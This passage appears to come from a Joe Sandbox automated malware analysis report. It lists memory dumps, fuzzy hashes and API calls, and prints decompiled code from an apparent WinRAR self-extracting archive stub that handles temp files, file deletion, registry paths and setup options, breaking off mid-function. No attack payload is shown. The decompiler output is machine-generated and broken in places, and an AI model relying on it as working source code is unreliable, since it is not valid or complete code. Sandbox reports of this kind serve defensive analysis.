                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 2148572870-0
                                                    • Opcode ID: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                    • Instruction ID: 2674951eefd261d97164b843f2e946a66bc480b070475869f001075cc800b20e
                                                    • Opcode Fuzzy Hash: 757b2e8c3205a196e7b19c4eca095ac1f4282726b75a58896e35b6073d9716c5
                                                    • Instruction Fuzzy Hash: CBF03C72A01219BBCB206BA5DD4CEDF7F7DEF51791F004012B60AD2150D6798686CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCC0C5(short* _a4, char _a12) {
				signed short* _v4;
				void* __ebp;
				intOrPtr* _t20;
				signed short* _t24;
				char _t27;
				char _t30;
				signed short* _t31;
				short _t32;
				signed int _t33;
				short _t34;
				signed short* _t37;
				char _t39;
				char _t40;
				char _t41;
				intOrPtr _t44;
				void* _t47;
				void* _t48;
				short* _t54;
				intOrPtr* _t56;
				signed short _t57;
				short* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed short* _t63;
				short _t66;
				signed short _t67;

				_t58 = _a4;
				_t20 = E00CCB92D(_t58);
				_t44 = _a4;
				_t59 = _t20;
				_t68 = _t59;
				if(_t59 != 0) {
					__eflags =  *((intOrPtr*)(_t59 + 2));
					if( *((intOrPtr*)(_t59 + 2)) == 0) {
						L7:
						__eflags = _t44 - (_t59 - _t58 >> 1);
						E00CD0602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
					} else {
						_t40 = E00CD1FBB(_t59, L".exe");
						__eflags = _t40;
						if(_t40 == 0) {
							goto L7;
						} else {
							_t41 = E00CD1FBB(_t59, L".sfx");
							__eflags = _t41;
							if(_t41 == 0) {
								goto L7;
							}
						}
					}
				} else {
					E00CD05DA(_t68, _t58, L".rar", _t44);
					_t59 = E00CCB92D(_t58);
					if(_t59 == 0) {
						L2:
						 *_t58 = 0;
						return 0;
					}
				}
				_t24 = 0x2e;
				_v4 = _t24;
				__eflags =  *_t59 - _t24;
				if( *_t59 != _t24) {
					goto L2;
				}
				__eflags =  *((intOrPtr*)(_t59 + 2));
				if( *((intOrPtr*)(_t59 + 2)) == 0) {
					goto L2;
				}
				__eflags = _a12;
				if(__eflags != 0) {
					_t12 = _t59 + 4; // 0x4
					_t65 = _t12;
					_t27 = E00CD047A( *_t12 & 0x0000ffff);
					__eflags = _t27;
					if(_t27 == 0) {
						L30:
						return E00CD0602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
					}
					_t30 = E00CD047A( *(_t59 + 6) & 0x0000ffff);
					__eflags = _t30;
					if(_t30 == 0) {
						goto L30;
					}
					_t31 = E00CE3E13(_t59);
					_t47 = 0x3a;
					_t14 = _t31 - 1; // -1
					_t54 = _t59 + _t14 * 2;
					 *_t54 =  *_t54 + 1;
					__eflags =  *_t54 - _t47;
					if( *_t54 == _t47) {
						_t66 = 0x30;
						while(1) {
							__eflags = _t54 - _t58;
							if(_t54 <= _t58) {
								break;
							}
							_t33 =  *(_t54 - 2) & 0x0000ffff;
							_t62 = _t33;
							__eflags = _t33 - _v4;
							if(_t33 == _v4) {
								break;
							}
							 *_t54 = _t66;
							_t34 = _t62 + 1;
							_t54 = _t54 + 0xfffffffe;
							 *_t54 = _t34;
							__eflags = _t34 - _t47;
							if(_t34 == _t47) {
								continue;
							}
							return _t34;
						}
						_t32 = 0x61;
						 *_t54 = _t32;
						return _t32;
					}
				} else {
					_t31 = E00CCBA1E(0, __eflags, _t58);
					_t63 = _t31;
					_t48 = 0x3a;
					 *_t63 =  *_t63 + 1;
					__eflags =  *_t63 - _t48;
					if( *_t63 == _t48) {
						_t67 = 0x30;
						while(1) {
							_v4 = _t63;
							 *_t63 = _t67;
							_t63 = _t63 - 2;
							__eflags = _t63 - _t58;
							if(_t63 < _t58) {
								break;
							}
							_t39 = E00CD047A( *_t63 & 0x0000ffff);
							__eflags = _t39;
							if(_t39 == 0) {
								break;
							}
							 *_t63 =  *_t63 + 1;
							__eflags =  *_t63 - _t48;
							if( *_t63 == _t48) {
								continue;
							}
							return _t39;
						}
						_t56 = _t58 + E00CE3E13(_t58) * 2;
						while(1) {
							__eflags = _t56 - _t63;
							if(_t56 == _t63) {
								break;
							}
							 *((short*)(_t56 + 2)) =  *_t56;
							_t56 = _t56 - 2;
							__eflags = _t56;
						}
						_t37 = _v4;
						_t57 = 0x31;
						 *_t37 = _t57;
						return _t37;
					}
				}
				return _t31;
			}





























                                                    0x00ccc0ca
                                                    0x00ccc0cf
                                                    0x00ccc0d4
                                                    0x00ccc0d8
                                                    0x00ccc0dc
                                                    0x00ccc0de
                                                    0x00ccc105
                                                    0x00ccc109
                                                    0x00ccc129
                                                    0x00ccc131
                                                    0x00ccc13a
                                                    0x00ccc10b
                                                    0x00ccc111
                                                    0x00ccc116
                                                    0x00ccc118
                                                    0x00000000
                                                    0x00ccc11a
                                                    0x00ccc120
                                                    0x00ccc125
                                                    0x00ccc127
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc127
                                                    0x00ccc118
                                                    0x00ccc0e0
                                                    0x00ccc0e7
                                                    0x00ccc0f2
                                                    0x00ccc0f6
                                                    0x00ccc0f8
                                                    0x00ccc0fa
                                                    0x00000000
                                                    0x00ccc0fa
                                                    0x00ccc0f6
                                                    0x00ccc141
                                                    0x00ccc142
                                                    0x00ccc146
                                                    0x00ccc149
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc14b
                                                    0x00ccc14f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc151
                                                    0x00ccc156
                                                    0x00ccc1bf
                                                    0x00ccc1bf
                                                    0x00ccc1c7
                                                    0x00ccc1cc
                                                    0x00ccc1ce
                                                    0x00ccc22f
                                                    0x00000000
                                                    0x00ccc23f
                                                    0x00ccc1d5
                                                    0x00ccc1da
                                                    0x00ccc1dc
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc1df
                                                    0x00ccc1e7
                                                    0x00ccc1e8
                                                    0x00ccc1eb
                                                    0x00ccc1ee
                                                    0x00ccc1f1
                                                    0x00ccc1f4
                                                    0x00ccc1fc
                                                    0x00ccc1fd
                                                    0x00ccc1fd
                                                    0x00ccc1ff
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc201
                                                    0x00ccc205
                                                    0x00ccc207
                                                    0x00ccc20c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc20e
                                                    0x00ccc211
                                                    0x00ccc214
                                                    0x00ccc217
                                                    0x00ccc21a
                                                    0x00ccc21d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc21d
                                                    0x00ccc226
                                                    0x00ccc227
                                                    0x00000000
                                                    0x00ccc227
                                                    0x00ccc158
                                                    0x00ccc159
                                                    0x00ccc15e
                                                    0x00ccc162
                                                    0x00ccc163
                                                    0x00ccc166
                                                    0x00ccc169
                                                    0x00ccc16d
                                                    0x00ccc16e
                                                    0x00ccc16e
                                                    0x00ccc172
                                                    0x00ccc175
                                                    0x00ccc178
                                                    0x00ccc17a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc180
                                                    0x00ccc185
                                                    0x00ccc187
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc189
                                                    0x00ccc18c
                                                    0x00ccc18f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc18f
                                                    0x00ccc19d
                                                    0x00ccc1ac
                                                    0x00ccc1ac
                                                    0x00ccc1ae
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc1a5
                                                    0x00ccc1a9
                                                    0x00ccc1a9
                                                    0x00ccc1a9
                                                    0x00ccc1b0
                                                    0x00ccc1b6
                                                    0x00ccc1b7
                                                    0x00000000
                                                    0x00ccc1b7
                                                    0x00ccc169
                                                    0x00ccc102

                                                    APIs
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CCB92D: _wcsrchr.LIBVCRUNTIME ref: 00CCB944
                                                    • _wcslen.LIBCMT ref: 00CCC197
                                                    • _wcslen.LIBCMT ref: 00CCC1DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsrchr
                                                    • String ID: .exe$.rar$.sfx
                                                    • API String ID: 3513545583-31770016
                                                    • Opcode ID: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                    • Instruction ID: 1b6b002f2aabfb91a04491bccd5b6ec8caa981fe83862c45f6b09dfa3b2a39ff
                                                    • Opcode Fuzzy Hash: d1febb07f671b0b801b1a84eb80f7360c5e779c6559f10bf1405384e151d06bc
                                                    • Instruction Fuzzy Hash: 3B413722500351A6C731AF75C882F7FB3B8EF40714F28094EFAA96B181EB619F81D391
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E00CDCE87(intOrPtr __ebx, void* __ecx, void* __edx) {
				intOrPtr _t225;
				void* _t226;
				signed int _t292;
				void* _t294;
				signed int _t295;
				void* _t299;

				L0:
				while(1) {
					L0:
					if(__ebx != 1) {
						goto L123;
					}
					L107:
					__eax = __ebp - 0x788c;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
					__eax = E00CCB690(__eflags, __ebp - 0x788c, 0x800);
					__ebx = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L109:
						_push( *0xcfe724);
						__ebp - 0x788c = E00CC4092(0xd0946a, __edi, L"%s%s%u", __ebp - 0x788c);
						__eax = E00CCA231(0xd0946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L108:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L110:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xd0946a);
					__eflags =  *(__ebp - 0x588c) - __bx;
					if( *(__ebp - 0x588c) == __bx) {
						while(1) {
							L175:
							_push(0x1000);
							_t213 = _t299 - 0x15; // 0xffffa75f
							_t214 = _t299 - 0xd; // 0xffffa767
							_t215 = _t299 - 0x588c; // 0xffff4ee8
							_t216 = _t299 - 0xf894; // 0xfffeaee0
							_push( *((intOrPtr*)(_t299 + 0xc)));
							_t225 = E00CDB314(0x800, _t299);
							_t277 =  *((intOrPtr*)(_t299 + 0x10));
							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
							if(_t225 != 0) {
								_t226 = _t299 - 0x588c;
								_t294 = _t299 - 0x1b894;
								_t292 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00CD1FBB(_t299 - 0xf894,  *((intOrPtr*)(0xcfe744 + _t295 * 4))) != 0) {
								_t295 = _t295 + 1;
								if(_t295 < 0xe) {
									continue;
								} else {
									goto L175;
								}
							}
							__eflags = _t295 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t295 * 4 +  &M00CDD41B))) {
								case 0:
									L9:
									__eflags = _t277 - 2;
									if(_t277 == 2) {
										E00CDA64D(_t299 - 0x788c, 0x800);
										E00CCA544(E00CCBDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
										 *(_t299 - 4) = 0;
										E00CCA67E(_t299 - 0x8894, _t299 - 0xd894);
										E00CC6EDB(_t299 - 0x388c);
										while(1) {
											L23:
											_push(0);
											_t240 = E00CCA5D1(_t299 - 0x8894, _t299 - 0x388c);
											__eflags = _t240;
											if(_t240 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t299 - 0x388c, 0);
											__eflags =  *(_t299 - 0x2880);
											if(__eflags == 0) {
												L16:
												_t244 = GetFileAttributesW(_t299 - 0x388c);
												__eflags = _t244 - 0xffffffff;
												if(_t244 == 0xffffffff) {
													continue;
												}
												L17:
												_t246 = DeleteFileW(_t299 - 0x388c);
												__eflags = _t246;
												if(_t246 != 0) {
													continue;
												} else {
													_t297 = 0;
													_push(0);
													goto L20;
													L20:
													E00CC4092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
													_t301 = _t301 + 0x14;
													_t251 = GetFileAttributesW(_t299 - 0x1044);
													__eflags = _t251 - 0xffffffff;
													if(_t251 != 0xffffffff) {
														_t297 = _t297 + 1;
														__eflags = _t297;
														_push(_t297);
														goto L20;
													} else {
														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
														__eflags = _t254;
														if(_t254 != 0) {
															MoveFileExW(_t299 - 0x1044, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00CCB991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
											E00CCB690(__eflags, _t299 - 0x1044, 0x800);
											_t298 = E00CE3E13(_t299 - 0x788c);
											__eflags = _t298 - 4;
											if(_t298 < 4) {
												L14:
												_t265 = E00CCBDB4(_t299 - 0x588c);
												__eflags = _t265;
												if(_t265 != 0) {
													break;
												}
												L15:
												_t268 = E00CE3E13(_t299 - 0x388c);
												__eflags = 0;
												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
												E00CDFFF0(0x800, _t299 - 0x44, 0, 0x1e);
												_t301 = _t301 + 0x10;
												 *((intOrPtr*)(_t299 - 0x40)) = 3;
												_push(0x14);
												_pop(_t271);
												 *((short*)(_t299 - 0x34)) = _t271;
												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
												_push(_t299 - 0x44);
												 *0xd2307c();
												goto L16;
											}
											L13:
											_t276 = E00CE3E13(_t299 - 0x1044);
											__eflags = _t298 - _t276;
											if(_t298 > _t276) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
										E00CCA55A(_t299 - 0x8894);
									}
									goto L175;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									} else {
										__eax =  *0xd1fc94;
										__eflags = __eax;
										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
										__eflags = __eax;
										if(__eax != 0) {
											__eax =  *0xd1fc94;
											_pop(__ecx);
											_pop(__ecx);
										}
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00CDB48E(__ecx, __edx, __eflags);
											__eax =  *0xd1fc94;
										} else {
											__esi = __ebp - 0x588c;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L33:
										__eax = E00CE3E13(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xd1fc94);
										__eax = E00CE3E3E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L37:
											__eflags = __bh;
											if(__bh == 0) {
												__eax = L00CE3E2E(__esi);
											}
											goto L175;
										}
										L34:
										 *0xd1fc94 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										L36:
										__eax = E00CE7686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
										goto L37;
									}
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
									}
									goto L175;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									}
									L42:
									__eflags =  *0xd0a472 - __di;
									if( *0xd0a472 != __di) {
										goto L175;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x588c;
									_push(0x22);
									 *(__ebp - 0x1044) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x588c) - __ax;
									if( *(__ebp - 0x588c) == __ax) {
										__edi = __ebp - 0x588a;
									}
									__eax = E00CE3E13(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L175;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1044;
												__eax = E00CE279B(__ebp - 0x1044, __ebp - 0x1044);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1044;
												__edi = 0xd0a472;
												E00CD0602(0xd0a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
												__eax = E00CDB1BE(__ebp - 0x1044, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xd0a472); // executed
												__eax = __ebp - 0x1044;
												__eax = E00CE3E49(__ebp - 0x1044, 0xd0a472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
												}
												goto L175;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xd23028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1044;
													_push(__ebp - 0x1044);
													__eax = __ebp - 0x24;
													_push(__ebp - 0x24);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xd23024();
													_push( *(__ebp - 0x1c));
													 *0xd23008() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1044) = __cx;
												}
												__eflags =  *(__ebp - 0x1044) - __bx;
												if( *(__ebp - 0x1044) != __bx) {
													__eax = __ebp - 0x1044;
													__eax = E00CE3E13(__ebp - 0x1044);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, "\\", __esi);
													}
												}
												__esi = E00CE3E13(__edi);
												__eax = __ebp - 0x1044;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L51;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L175;
										}
										L49:
										__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, 0x800);
										goto L63;
									}
								case 4:
									L68:
									__eflags =  *0xd0a46c - 1;
									__eflags = __eax - 0xd0a46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__edx + 7) & __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xd08457 = __cl;
										 *0xd08460 = 1;
										goto L175;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xd08457 = __cl;
										L79:
										 *0xd08460 = __cl;
										goto L175;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L175;
									}
									L77:
									 *0xd08457 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0xd0c577 = 1;
									__edi = 1;
									__eax = __ebp - 0x588c;
									__eflags =  *(__ebp - 0x588c) - 0x3c;
									__ebx = __esi;
									 *(__ebp - 0x14) = __eax;
									if( *(__ebp - 0x588c) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
												goto L175;
											}
											L101:
											__eflags = __ebx - 6;
											if(__ebx != 6) {
												goto L175;
											}
											L102:
											__ecx = 0;
											__eflags = 0;
											_push(0);
											L103:
											_push(__edi);
											_push(__eax);
											_push( *(__ebp + 8));
											__eax = E00CDD78F(__ebp);
											goto L175;
										}
										L98:
										__eflags = __ebx - 9;
										if(__ebx != 9) {
											goto L175;
										}
										L99:
										_push(1);
										goto L103;
									}
									L87:
									__eax = __ebp - 0x588a;
									_push(0x3e);
									_push(__ebp - 0x588a);
									__eax = E00CE22C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										L96:
										__eax =  *(__ebp - 0x14);
										goto L97;
									}
									L88:
									_t103 = __eax + 2; // 0x2
									__ecx = _t103;
									 *(__ebp - 0x14) = _t103;
									__ecx = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x10c;
									_push(0x64);
									_push(__ebp - 0x10c);
									__eax = __ebp - 0x588a;
									_push(__ebp - 0x588a);
									__eax = E00CDAF98();
									 *(__ebp - 0x20) = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										goto L96;
									}
									L89:
									__esi = __eax;
									while(1) {
										L90:
										__eflags =  *(__ebp - 0x10c);
										if( *(__ebp - 0x10c) == 0) {
											goto L96;
										}
										L91:
										__eax = __ebp - 0x10c;
										__eax = E00CD1FBB(__ebp - 0x10c, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x10c;
										__eax = E00CD1FBB(__ebp - 0x10c, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x10c;
										__eax = E00CD1FBB(__ebp - 0x10c, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x10c;
										_push(__ebp - 0x10c);
										_push(__esi);
										__esi = E00CDAF98();
										__eflags = __esi;
										if(__esi != 0) {
											continue;
										} else {
											goto L96;
										}
									}
									goto L96;
								case 7:
									goto L0;
								case 8:
									L127:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x588c) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x588c;
											_push(__ebp - 0x588c);
											__eax = E00CE7625(__ebx, __edi);
											_pop(__ecx);
											 *0xd1fc9c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xd1fc98 = E00CDB48E(__ecx, __edx, __eflags);
									}
									 *0xd0c576 = 1;
									goto L175;
								case 9:
									L132:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L175;
									}
									L133:
									__eax = 0;
									 *(__ebp - 0x2844) = __ax;
									__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
									__eax = E00CE79E9( *(__ebp - 0x1b894) & 0x0000ffff);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										 *(__ebp - 0x14) = 2;
										__eax = 0xd1cb82;
									} else {
										__eflags = __eax - 0x54;
										if(__eax == 0x54) {
											 *(__ebp - 0x14) = 7;
											__eax = 0xd1bb82;
										} else {
											 *(__ebp - 0x14) = 0x10;
											__eax = 0xd1db82;
										}
									}
									__esi = 0x800;
									__ebp - 0x2844 = E00CD0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
									__eax = 0;
									 *(__ebp - 0x9894) = __ax;
									 *(__ebp - 0x1844) = __ax;
									__ebp - 0x19894 = __ebp - 0x688c;
									__eax = E00CD0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x688c) - __bx;
									if( *(__ebp - 0x688c) != __bx) {
										L141:
										__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
										__eflags = __al;
										if(__al != 0) {
											goto L160;
										}
										L142:
										__ax =  *(__ebp - 0x688c);
										__esi = __ebp - 0x688c;
										__ebx = __edi;
										__eflags = __ax;
										if(__ax == 0) {
											L159:
											__esi = 0x800;
											goto L160;
										}
										L143:
										__edi = __ax & 0x0000ffff;
										do {
											L144:
											_push(0x20);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di == __ax) {
												L146:
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
												__eflags = __al;
												if(__al == 0) {
													L155:
													__esi->i = __di;
													goto L156;
												}
												L147:
												__ebp - 0x688c = E00CCA243(__ebp - 0x688c);
												__eax = E00CCA28F(__eax);
												__eflags = __al;
												if(__al != 0) {
													goto L155;
												}
												L148:
												_push(0x2f);
												_pop(__ecx);
												__eax =  &(__esi->i);
												__ebx = __esi;
												__eflags = __di - __cx;
												if(__di != __cx) {
													L150:
													_push(0x20);
													__esi = __eax;
													_pop(__eax);
													while(1) {
														L152:
														__eflags = __esi->i - __ax;
														if(__esi->i != __ax) {
															break;
														}
														L151:
														__esi =  &(__esi->i);
														__eflags = __esi;
													}
													L153:
													__ecx = __ebp - 0x1844;
													__eax = __esi;
													__edx = 0x400;
													L154:
													__eax = E00CD0602(__ecx, __eax, __edx);
													 *__ebx = __di;
													goto L156;
												}
												L149:
												 *(__ebp - 0x1844) = __cx;
												__edx = 0x3ff;
												__ecx = __ebp - 0x1842;
												goto L154;
											}
											L145:
											_push(0x2f);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di != __ax) {
												goto L156;
											}
											goto L146;
											L156:
											__esi =  &(__esi->i);
											__eax = __esi->i & 0x0000ffff;
											__edi = __esi->i & 0x0000ffff;
											__eflags = __ax;
										} while (__ax != 0);
										__esi = 0x800;
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											 *__ebx = __ax;
										}
										goto L160;
									} else {
										L139:
										__ebp - 0x19892 = __ebp - 0x688c;
										E00CD0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
										_push(__ebx);
										_push(__ebp - 0x688a);
										__eax = E00CE22C6(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										__eflags = __eax;
										if(__eax != 0) {
